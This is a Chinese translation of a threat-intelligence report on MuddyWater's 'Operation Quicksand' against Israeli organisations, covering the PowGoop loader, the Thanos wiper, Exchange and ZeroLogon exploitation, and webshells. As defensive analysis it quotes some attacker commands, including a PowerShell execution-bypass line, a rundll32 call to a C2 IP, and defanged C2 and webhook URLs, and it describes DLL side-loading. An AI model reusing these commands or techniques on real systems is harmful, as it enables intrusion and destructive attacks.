MuddyWater 针对以色列发起的“流沙”行动

  • A+
所属分类:安全新闻
NO.1 【背景概述】



摘要

在2020年9月期间,ClearSkySec 侦测到了针对以色列许多重要组织机构的新一轮攻击活动。这些攻击背后的始作俑者被认为是来自伊朗的APT组织 “MuddyWater”(别名:TEMP.Zagros, Static Kitten, Seedworm)。
在整个攻击活动期间,Muddy Water 试图安装 “PowGoop” 的一个变种。安全厂商 Palo Alto的分析报告表明,“PowGoop” 是一个加载器,负责加载具有破坏性功能的Thanos勒索软件变种。在这次攻击行动中, “PowGoop” 会伪装为 Google 更新文件中的一个 dll。
ClearSkySec 的研究人员认为,Muddy Water 的此次攻击试图将“破坏性”掩盖在具有经济目的的勒索软件的攻击之下(类似于2017年的 NotPetya攻击)。虽然研究人员并未观察到 MuddyWater 在野的破坏性攻击案例,但由于 Thanos 本身具有破坏性攻击的功能,并且该组织又具有国家级APT的背景。再结合 Muddy Water 过往的攻击活动,其最后的要达到的目的更倾向于是造成破坏性的影响,而非简单的进行财务勒索。
在今年的9月4号,Palo Alto 发布了一篇关于这个 Thanos 破坏性变种的分析报告。他们在报告中称受害者主要是来自中东和北非的政府组织或者机构,但并未归因至任何攻击组织。这个变种的加载器被称为 “PowGoop“,伪装成了一个Google 更新机制的一部分。由于在代码层面,“PowGoop” 和 Muddy Water 过往的一些恶意软件都使用了 MoriAgent/PudPoul dll 加载器。基于这种相似性,“PowGoop” 被归因为 Muddy Water 所使用的恶意软件。
ClearSkySec 的研究人员发现了恶意载荷投递的两种方式:
第一种攻击方式需要先向受害者发送一个 PDF 或者 Excel 诱饵文档,该文档通过 OpenSSL 与 C2 通信并投递后续用于部署 “PowGoop” 的文件。
第二种攻击方式利用 CVE-2020-0688 漏洞并通过 aspx 文件(WebShell)来部署 payload。攻击者会与受害者机器建立一个定制化的 SSF socket 管道。然后攻击者通过这个管道投递 “PowGoop”。近期,微软同样也披露了 MuddyWater 使用了ZeroLogon 漏洞(CVE-2020-1472)。
这已经不是具有伊朗背景的攻击组织第一次将 Wiper(擦除器)作为他们 TTP 的一部分。另一个著名的组织 APT33 至少在3次不同的攻击中使用了 Wiper。与 APT33 相比,MuddyWater 的攻击活动更倾向于进行社工类的攻击。MuddyWater 以往最为主要的目标是进行间谍活动和信息窃取。而在这次的“流沙”行动中,研究人员发现了第一个已知的由 MuddWater 发起的具有潜在破坏性的攻击,其主要的目标是以色列和一些其他国家的知名组织机构。
来自 ClearSkySec 的研究人员在受害者网络中找到了一个 PDB 包含了 “Covic” 这个单词。这暗示了 MuddyWater 可能会依据 Covid-19 作为一种攻击诱饵文件的主题。同时,这也从侧面表明,该恶意软件的开发时间在 Covid-19 爆发之后。


具有伊朗背景的破坏性攻击活动

来自伊朗的攻击者,曾针对阿拉伯半岛地区,发动过多起具有破坏性的攻击活动。但是本文所讨论的这次破坏性攻击事件的规模在过往只发生过一次,而且攻击者也不是这次事件中的 MuddyWater。
在2012年,一个伊朗攻击者使用 Shamoon 擦除器攻击了一个来自沙特的石油与天然气公司 Aramco。2016-2018年期间,安全研究人员也观测到了 Shamoon 的数个变种。这些攻击在过往被 FireEye 和 McAfee 的安全人员归因于 APT33(Elfin)。在2019-2020年期间,两个新的 擦除器 ZeroCleare 和 Dustman 被用于针对阿拉伯半岛的攻击活动。而Dustman和ZeroCleare被分别归因于APT33 和APT34
在2020年5月,FOX News 报道了一个由伊朗的攻击者发起的针对以色列水利系统的攻击。但以色列官方并未证实该攻击来自伊朗。
尽管上文中提到了多起具有伊朗背景的攻击使用了擦除器,但本文披露的这起“将Wiper伪装为勒索软件”的攻击还是第一次。


伪装为勒索软件的擦除器

Petya勒索软件首次出现于2016年,主要针对微软的Windows系统,在当时造成了非常广泛的影响。不久后,出现了一个类似的恶意软件(NotPetya),伪装为Petya 勒索软件发起攻击,包括乌克兰在内的多个国家和地区的机构遭受重创。这种恶意软件被设计成勒索软件,但其真正的目的是破坏受害者的系统和网络。虽然与一般的勒索软件类似,其会加密文件。但因被攻击者进行了特殊修改,所以即使受害者缴纳赎金,也无法还原和解密文件。这些攻击被归因于一个具有俄罗斯背景的攻击组织 Sandworm(也被称为Voodoo Bear 和Iron Viking)。
“流沙”行动中的攻击方式与其非常相似。根据 Palo Alto 报告,攻击者会通过PowGoop 加载器,安装并运行“Thanos” 勒索软件变种。一旦这个勒索软件被安装,受害者就会收到一条如何解密的信息,但其硬盘的主引导扇区(MBR)会被擦除。


NO.2 【“流沙”行动中的技术与工具】



技术

漏洞利用:在本次攻击活动中,MuddyWater 主要使用了两个1-day 漏洞:

  • CVE-2020-1472:攻击者可以使用 Netlogon 远程协议(MS-NRPC)与域控制器建立一个具有提权漏洞的 Nelogon 安全通道。

  • CVE-2020-0688:微软的Exchange软件不能正确的处理内存中的对象时,存在的一个远程代码执行漏洞,也被称为“微软 Exchange 内存损坏漏洞”

宏:一个嵌入了恶意宏的 Excel 文档。该恶意宏会安装三个被用于第一阶段攻击的文件。

PowerShell:在感染阶段,一个包含了 Powershell 代码的恶意文件会被投递至受害者主机。

VBA 代码:被用于感染阶段的恶意VBS脚本。

账户窃取:攻击者会窃取域管理员账户并将其用于DCSync 攻击。


由MuddyWater自主开发的工具

注入工具:

  • 基于PDF的Dropper:MuddyWater使用PDF文件作为他们的诱饵文件。PDF文件中被注入了恶意代码,用于向系统中部署第二个攻击阶段要使用的文件。

攻击工具:

  • WebShell:攻击者会安装一个名为 “IndexEchangeManagment.aspx” ASP.NET WebShell。这个WebShell 在后续阶段会投递 SSF.mx 后门。

  • Covicli 后门:诱饵文件在受害者的系统中被运行之后,攻击者会使用一个被修改过的SSLeay32 动态库作为后门。这个动态库允许攻击者通过 OpenSSL 与 C2 通信。由于其 PDB 位于路径 “Covicmodulescli.pdb”,因此 ClearSkySec 的研究人员将其称为 “Covicli” 后门。

  • SSF.mx:在漏洞利用阶段之后,攻击者会使用 WebShell 来投递一个用于在两个受害者机器之间通信的可执行文件。这个文件的文件名(SSF.exe)也曾被SecureWorks报道过,其源码存储在 Github 上。而本文所述的这个可执行文件是前述 SSF 文件的一个变种。

  • PwoGoop 加载器:PowGoop 加载器曾被 Palo Alto 的研究人员发现用于“流沙”行动。PowGoop 实际由一个 DLL 加载器和一个基于 PowerShell 的下载器组成。PowGoop会伪装为goopdate.dll ,该文件通常会被合法签名的Google更新程序加载运行。

攻击链与TTP

在这次攻击中涉及的多个不同的工具与技术可以根据Kill Chain模型,总结为下文的表格。依据ClearSkySec的研究,可以将这次攻击活动划分为两种类型的攻击方式:基于漏洞(后文称攻击A)和基于社工(后文称攻击B)的攻击。下面是依据这两个不同的攻击方式构建的两条攻击链:
  • 攻击方式A:

    侦查跟踪 --> 武器构建 --> 漏洞利用 --> 安装植入 --> 命令与控制 --> 目标达成

  • 攻击方式B:

    武器构建 --> 载荷投递 --> 安装植入 --> 命令与控制 --> 目标达成


这两条攻击链除了在感染方式有所不同,在其余的攻击阶段高度相似。下表展示了不同攻击活动(基于漏洞的攻击A和基于社工的攻击B)在技术和工具上的重叠部分。

MuddyWater 针对以色列发起的“流沙”行动

表1. 攻击向量A 和 攻击向量B 的工具与技术


NO.3 【MuddyWater 的攻击步骤】



本文的第三部分将上文提到的两种攻击方式的具体实施细节进行阐述。
基于漏洞的攻击向量 A

漏洞利用

攻击方式A所利用的存在漏洞的软件涉及:OWA,微软 Exchange 服务器或 Windows ZeroLogon 。
  • CVE-2020-0688 微软 Exchange 漏洞:微软的Exchange软件不能正确的处理内存中的对象时,存在的一个远程代码执行漏洞,这个漏洞也被称为“Microsoft Exchange 内存损坏漏洞”。这个漏洞最终会给攻击者提供系统级的代码执行权限。

  • CVE-2020-1472 Netlogon Remote Protocol (MS-NRPC) 漏洞:当攻击者使用Netlogon Remote Protocol(MS-NRPC)与域控制器之间建立一个NetLogon 安全信道时,可以利用“'Netlogon 提权漏洞”来提升权限。

安装植入


安装WebShell
在对 Exchange 服务器进行漏洞利用之后,攻击者会上传一个 WebShell 到被攻陷的服务器。在 ClearSkySec 对 “流沙”行动中受害者的服务器进行了调查之后,找了一个名为 “LiveIdError.aspx” 的 WebShell,这个文件名也表明了其利用的漏洞。这个漏洞也是在攻击者投递 WebShell 时使用的唯一一个已经被披露出来的漏洞。
该 WebShell 被用于投递另一个 ASP.NET 的 WebShell 作为 payload。这个 WebShell 的名称为 “IndexExchangeManagment.aspx”(注意:这个文件名称错误拼写了management 这个单词)


MuddyWater 针对以色列发起的“流沙”行动           图1. 两个 WebShell 在受害者主机上存放的路径

攻击者需要获得必须的权限才能成功的执行漏洞利用。ClearSkySec 的研究人员认为MuddyWater 使用了 Mimikatz 来窃取响应的凭证从而获得权限。此外,ClearSkySec 的研究人员还在 Gihub 上找了一个漏洞执行的说明文件,该文件同样具有伊朗背景。

SSF.mx
使用上文中提到的 WebShell,攻击者会向受害者主机投递一个 zip 文件,其中包括了一个名为 SSF.exe 的可执行文件。SSF.exe 在安全厂商 SecurWorks 过往的报告中被描述为 MuddyWater 安装在被攻陷主机中的Payload。SSF.exe 基于一个开源工具开发,目的是让C2主机和受害者主机或者两个受害者主机之间可以进行 SSF(Secure Socket Funneling)通信。攻击者可以在一个SSF 信道上,从多个TCP和UDP端口向受害者主机发送数据。
在这次的事件中,ClearSkySec 的安全人员发现的 SSF.mx 是上文中提到的在 Github 上开源的SSF工具的变种。攻击者可以利用 SSF.mx  执行 shell 命令。而在安装完 PwoGoop 加载器之后,攻击者又会尝试去删除受害者主机上的 SSF.mx 以掩盖其攻击痕迹。


命令与控制

在获得了受害者网络的访问权限之后,攻击者开始对受害者的网络进行侦查,比如对受害者网络中特定域的域管理员账户进行查询和枚举。
攻击者同样会利用SSF.mx 提供的安全信道,在受害者网络中传播并执行 PowerShell 脚本。在对 MuddyWater 此次的攻击的溯源工作中同样也发现了攻击者向受害者网络中分发 PowGoop 加载器。除此之外,MuddyWater 还使用了计划任务来执行 GoopDate.dll (PowGoop 的伪装名称)


基于社工的攻击向量 B

载荷投递

MuddyWater 所使用的第二个攻击方式和其过往常见的攻击方式更为一致。这可能是因为只有在使用攻击方式 B 对受害者系统完成了初始访问之后,MuddyWater 才使用攻击方式A。
在投递的开始阶段,受害者会收到了一个指向其公司邮箱文件存储服务的链接。通过这种方式,受害者会投递一个包含了感染文件的ZIP。

MuddyWater 针对以色列发起的“流沙”行动

图2. 恶意邮件内容
Zip 文件会包含以下两种文件中的一个:
  • 包含了能与 C2 通信的恶意宏的 Excel 文档。通信的 C2 通常是被攻击者攻陷的服务器。

  • 一个能向受害者主机中投递恶意 DLL 的 PDF 文件。投递 PDF 在 MuddyWater 攻击中属于相对较新的方式。


安装植入

嵌入在 Excel 中的 VB 宏代码

MuddyWater 针对以色列发起的“流沙”行动 

图3. 恶意 Excel 文件的截图

宏代码可以被分为不同的部分:

MuddyWater 针对以色列发起的“流沙”行动

图4. 被分割为不同部分的宏代码
每个部分的代码都以不同的方式进行编码,包括 ASCII,XOR 和 base64。下图是在解码之前的代码:
        
MuddyWater 针对以色列发起的“流沙”行动 图5. 解码前的代码
将每个部分解码过后的代码组合之后,Excel 文件会通过一个 COM 组件(taskschd.dll)在后台运行第二次:"C:Program FilesMicrosoft OfficeOffice14EXCEL.EXE" /automation -Embedding" 。
这个组件会投递两段 PowerShell 代码,并自动执行一个计划任务来激活 WScript:MuddyWater 针对以色列发起的“流沙”行动
图6. 激活 WScript
该 PowerShell 代码会与一个被攻击者攻陷的服务器进行通信,这个服务器同样也被用于投递第二阶段的恶意文件。而另一台服务器是一个用于存储额外文件的 C2 服务器。

MuddyWater 针对以色列发起的“流沙”行动图7. 与被攻陷的服务器进行通信的 PowerShell 代码

恶意程序接下来会通过一个名为 “dl” 并且包含了 PowerShell 命令的文件来进行通信。下面这个命令被用于执行该文件:
“C:WindowsSystem32WindowsPowerShellv1.0powershell.exe" -exec bypass -fileC:userspublicdl.ps1”
恶意程序通过 GET 的方法,以 TCP 的形式(在443 端口)来与服务器进行通信。下面这个命令被用于下载一个 js 文件:
“$url = 'hxxps://webmail.lax.co[.]il/owa/auth/Current/Script/jquery-3.5.1.min.js”

MuddyWater 针对以色列发起的“流沙”行动图8. js的下载命令

一个被名为 “db.vbs” 的 VBS 文件被投递并存储至 Public 文件夹。它包含了用于提取 “putty.ps1” 的 PowerShell 命令。这个文件后续被用于在第二个C2服务器和感染主机之间进行通信,为下一步将后续恶意软件安装到被感染的机器上做准备。
第二个 C2 服务器是一个 webhook (反向API)。攻击者可以从这个站点上下载一些特定文件。下面的三个链接是 ClearSkySec 的研究人员在调查期间发现的三个webhook 链接。
"hxxps://webhook[.]site/7c1564f7-4e3c-4082-b1f8-3b52da3d9941"
"hxxps://webhook[.]site/861f0c6f-238a-4878-8e44-0ca078ad9b2c"
"hxxps://webhook[.]site/f4c2dba3-bdba-44a3-b8b8-f292b6fb8a7b"
Covicli 后门会从通过 webhook 投递到受害者主机中。与使用 Excel 的攻击方式相同,恶意软件随后会在受害者主机上投递一个压缩文件(主要是 ZIP)。压缩文件中包含了用希伯来语编写,有关贷款内容的 PDF 文档。
MuddyWater 针对以色列发起的“流沙”行动
图9. PDF文档截图
在恶意负载被执行后,恶意软件会删除 PDF 和恶意 DLL。攻击者除了通过删除文件来掩盖其攻击痕迹,他们还实现了几个伪装的组件,并设法了绕过 windows 的防御机制和多个身份识别系统。此外他们还使用了 Hewlett-Packard MFP 代替了 NSIS 可执行文件。同时,一个新的文件夹会在下面这个路径下创建:“C:users\AppDataLocal”
为了实现持久化,恶意文件会被拷贝至 %temp% 文件夹下,然后删除其原始文件夹下的副本。另一个带有 PDF 图标的文件将会被拷贝至 Startup 文件夹下。攻击者同样也会创建一个计划任务来执行 xca_db_stat.exe。
接下来,攻击者会在下面这个路径创建两个注册表键值:
“HKEY_CURRENT_USERSoftwareElectrum”
下表说明了其实际值对应的内容
MuddyWater 针对以色列发起的“流沙”行动

表2. 注册表键值含义

Covicli 后门

接下来,恶意程序会投递一个名为 SSLeay32.dll 的dll文件。这是一个被修改过的OpenSSL 动态库。在这个文件中包含了一个 PDB 路径 “G:ProjectCovicModulesCLI.dll ”。由于这个路径中包含了 Covic 一词,同时文件名为Cli,所以 ClearSkySec 的研究人员将其称为 Covicli 后门。这个文件同样包含了一个 .net4 模块的版本 ID。

命令与控制

攻击者使用了如下命令通过 OpenSSL 与 C2 进行通信:
“Rundll32.exe C:ProgramDataRozellaBobinessleay32.dll, DllRegisterServerhxxp://185.183.96[.]61:80/downloadc.php?key=WKXKgRkJsT ”
这个服务器的地理位置与阿塞拜疆政府有关。请求该服务器的 80 端口(无路径)得到以下结果:

MuddyWater 针对以色列发起的“流沙”行动

图10. 请求结果
恶意软件本身会生成一个名为 Updater 的计划任务,使用 PowerShell 与上述这个服务器进行通信,与 MoriAgent 非常相似。PowerShell 会运行:ipconfig,arp 等命令。

目标达成

PowGoop 加载器:成功连接C2后, 恶意软件会将 PowGoop 加载器安装至系统。在安装之后,攻击者会尝试使用以下命令从受害者主机中删除 SSF.mx :

MuddyWater 针对以色列发起的“流沙”行动

图11. 删除 SSF.mx 的命令

根据 ClearSkySec 研究人员的分析,PowGoop 包含了下面5个组件:
  • GoogleUpdate.exe - 合法签名的文件

  • goopdate86.dll - 合法的 DLL,但可以被用于进行 DLL 侧加载攻击

  • goopdate.dll - PowGoop 的第一个Loader

  • goopdate.dat - PowGoop 的第二个 Loader,用于解码 PowerShell 的下载组件

  • config.txt - 经过编码的 PowerShell 下载器

这与Palo Alto 对 PowGoop 分析出的四个组件有所不同。Palo Alto 报告中 PowGoop 加载器在本文所描述的变种中被分为了两个部分,而本文所描述的第二个 Loader 在功能上和 Palo Alto 所描述的 Loader 一致。这同样也说明了,攻击者在将一些组件进行拆分,来逃避一些反病毒引擎的检测。
本文案例中的 GoogleUpdate.exe 是一个合法签名的文件,但其会被攻击者用于DLL 侧加载攻击。GoogleUpdate.exe 运行时需要依赖goopdate86.dll,而goopdate86.dll运行时则需要依赖goopdate.dll。恶意软件会用同名的恶意文件替换原始文件,最终将恶意的 payload 加载到内存中。


PowGoop 会以如下的流程执行:
  • GoogleUpdate.exe (合法签名的)会加载一个合法的 goopdate86.dll 至内存

  • goopdate86.dll 会加载一个 恶意的 goopdate.dll 至内存(通过侧加载)

  • 恶意的 goopdate.dll 会执行使用 DLLRegisterServer 参数执行 rundll32.exe

  • 从恶意的 goopdate.dll 中的导出函数 DLLRegisterServer 执行后,会加载第二个被混淆过的加载器 goopdate.dat 至内存

  • 在第二个加载器中嵌入的一个脚本会解码一个 config.txt, 配置文件包含了一个已经解码过的 PowerShell 的路径用于执行现在正在解码的脚本

解码后的脚本会与C2通信并作为下载器等待新的 payload
下面的截图展示了 PowGoop 在受害者机器中执行的过程以及从中提取的 PowerShell 脚本。

MuddyWater 针对以色列发起的“流沙”行动

图12. PowGoop 的执行过程

与 Palo Alto 报告的 .dat 文件不同,本文所述的加载器会使用 goopdate.dat 文件。
MuddyWater 针对以色列发起的“流沙”行动

图13. 本文加载所使用的 goopdate.dat 文件

这个文件会和 Covicli 后门共享一个 PDB 路径 :
“G:ProjectCovicModulesgoopdate.pdb”
NO.4 【归因分析】


MuddyWater 是伊朗最为活跃的 APT 组织之一。从2018年以来,他们就针对以色列的多个目标实施了一系列的攻击。在过去几年中,来自 ClearSkySec 的分析人员发现的 MuddyWater 攻击的受害者包括 个体,公司,组织和政府部门,主要为社工攻击。在这期间也有针对伊朗内部人员的攻击。
MuddyWater 的攻击活动可以被归类为3个独立的周期和攻击场景(以时间顺序):
  • “PowerStat” 时期:这一时期的攻击使用了 Office 文档(最初是 Word 文档,两年后变为 Excel文档)作为攻击的起始点。这些文档内含恶意宏脚本,宏脚本激活后会与命令和控制服务器通信,然后下载 PowerShell 代码,和其他的服务器进行通信,最后安装 PowerStats RAT。

  • DNS Tunneling 时期:在这个攻击周期内,MuddyWater 使用和前述周期相同的 Office 文档,但使用 DNS 的方式与他们自己的服务器进行通信。在这个时期被主要使用的工具是一个名为 “ForeLord” 的DLL,作为 RAT 的一部分。该组织会注册一些域名来伪装为安全公司,比如趋势科技,卡巴斯基和 ClearSkySec。

  • PubPoul/MoriAgent 时期:在过去的几个月内,ClearSkySec 的研究人员发现了 MuddyWater 新一轮的攻击,主要特征是在生成恶意的可执行文件后会在受害者的机器上删除两个文件:一个合法的 PDF 文件和一个名为 “MoriAgent” 恶意的 DLL。随着调查的深入,研究人员发现了 “MoriAgent” 的变种并由其文件名 “pudding.dll” 命名为 “PudPoul”。这一时期的攻击活动是目前 MuddyWater 最新的攻击活动,但在整个攻击活动期间,分析人员只能确定被安装在受害者机器上的相关恶意软件或者工具,而无法确定这些工具后续使用的目的。这与 “PowerStat” 和 “DNS” 时期进行的以情报收集 或/和 破坏为目的活动截然不同。来自 Palo Alto 的分析人员在上周刚刚发布了与“Thanos” 擦除器相关的报告,其在被激活时会模仿勒索软件。ClearSkySec 在调查期间也发现了许多 PudPoul 文件和 “Thanos” 擦除器的一致性,这也加强了其与 MuddyWater 的关联。


尽管如此,ClearSkySec 认为“Thanos”恶意软件变种与 MuddyWater攻击组织之间的关联仍存疑:
  • MuddyWater此前一直在进行情报信息窃取类活动,从未发动过具有破坏性的攻击。

  • 该组织一直以来都使用基于社工的攻击。

  • 来自中东地区某个国家(伊朗)的APT33 组织在过往进行过一些破坏性的攻击,但还未和 MuddyWater 产生直接的联系。


可能是该 APT 组织的战略定位发生了变化,从情报收集进入了破坏性攻击的阶段。在 ClearSkySec 的调查期间确定了一些C2和额外的文件,属于 MuddyWater 攻击基础设施的一部分。
一旦该组织部署了相应的工具,就可以进行密钥交换并在受害者的网络中持久化并与 C2 服务器进行通信。这一过程显然是在为安装恶意软件做准备。基于对 “Thanos” 的分析,ClearSkySec 的研究人员认为 MuddyWater 正在试图展开具有破坏性的攻击。


NO.5 【总结】


MuddyWater 在2020年更新了他们的 TTP 和技术水平。该组织在被发现以来就一直在从事间谍活动,主要是针对一些私人组织,政府部门。

MuddyWater 主要依靠社工手段进行攻击。比如,在2019年末,MuddyWater 对一名美国知名的记者进行了攻击。在攻击的第一阶段,MuddyWater 首先向受害者发送电子邮件,但不包含任何附件或者链接。他们会通过邮件安排与受害者的会面。而在经过几轮邮件交流后,他们又会表示不能见面,从而顺理成章给受害者发送恶意文件。但本文所描述的一部分攻击与过去 MuddyWater 的攻击不同,主要采用了漏洞利用的方式作为攻击的起始点。

MuddyWater 的技术能力非常强,潜在的被攻击者需要加强防御,以有效应对 MuddyWater 后续可能发动的,更加隐蔽的破坏活动。在本文所述的攻击活动中,攻击最后被阻止,所以在调查时无法确定 “PowGoop” 后续是否会进行破坏性的活动。但根据之前Palo Alto发布的关于该加载器的分析,其很有可能会在后续的活动中进行破坏性的攻击。

以色列和伊朗在网络空间中日益紧张的关系是 MuddyWater 战略转变的一种推动力。这种紧张关系始于十年前以色列和美国发动的 Stuxnet 攻击。伊朗对这次攻击进行了回应,其中之一便是具有破坏性的Shamoon 攻击,被归因于 APT33 组织。两国间紧张的局势在近期出现了新的升级,首先是“Fox Kitten”行动的曝光,以及伊朗对以色列的水利部门发动的攻击。

还有一种可能的解释是对卡西姆·苏莱曼尼(前伊朗伊斯兰革命卫队圣城旅旅长)死亡的一种报复行为。就在卡西姆·苏莱曼尼被暗杀的同一天,“Dustman” 擦除器被曝光。因此分析人员认为“流沙”行动就是针对卡西姆·苏莱曼尼被暗杀的报复活动。

NO.6【附录:威胁指标】



哈希

MuddyWater 针对以色列发起的“流沙”行动

URL 和 C2 地址

MuddyWater 针对以色列发起的“流沙”行动

end



本文为CNTIC编译,不代表本公众号观点,转载请保留出处与链接。

联系信息进入公众号后点击“论坛信息”可见。


原文标题: Operation Quicksand MuddyWater’s Offensive Attack Against Israeli Organizations

原文地址:
https://www.clearskysec.com/wp-content/uploads/2020/10/Operation-Quicksand.pdf
编译:CNTIC情报组


MuddyWater 针对以色列发起的“流沙”行动


本文始发于微信公众号(国家网络威胁情报共享开放平台):MuddyWater 针对以色列发起的“流沙”行动

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: